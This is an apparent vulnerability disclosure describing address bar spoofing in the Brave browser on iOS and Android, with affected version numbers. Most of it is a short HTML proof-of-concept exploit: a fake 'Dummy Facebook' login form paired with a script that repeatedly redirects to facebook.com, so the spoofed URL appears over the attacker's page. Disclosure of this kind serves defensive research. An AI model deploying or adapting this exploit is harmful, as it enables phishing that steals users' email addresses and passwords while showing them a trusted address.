30 lines
No EOL
1,017 B
HTML
30 lines
No EOL
1,017 B
HTML
Brave Browser Suffers from Address Bar Spoofing Vulnerability. Address Bar
|
|
spoofing is a critical vulnerability in which any attacker can spoof the
|
|
address bar to a legit looking website but the content of the web-page
|
|
remains different from the Address-Bar display of the site. In Simple
|
|
words, the victim sees a familiar looking URL but the content is not from
|
|
the same URL but the attacker controlled content. Some companies say "We
|
|
recognize that the address bar is the only reliable security indicator in
|
|
modern browsers" .
|
|
Products affected:
|
|
|
|
- In IOS - Affected is the Latest Version 1.2.16 (16.09.30.10)
|
|
- In Android - Affected in Brave Latest version 1.9.56
|
|
|
|
|
|
Exploit Code:
|
|
|
|
<html>
|
|
<title>Address Bar spoofing Brave</title>
|
|
<h1> This is Dummy Facebook </h1>
|
|
<form>
|
|
Email: <input type="text" name="username" placeholder="add email"><br>
|
|
Password: <input type="text" name="password" placeholder="pass">
|
|
<script>
|
|
function f()
|
|
{
|
|
location = "https://facebook.com"
|
|
}
|
|
setInterval("f()", 10);
|
|
</script>
|
|
</html> |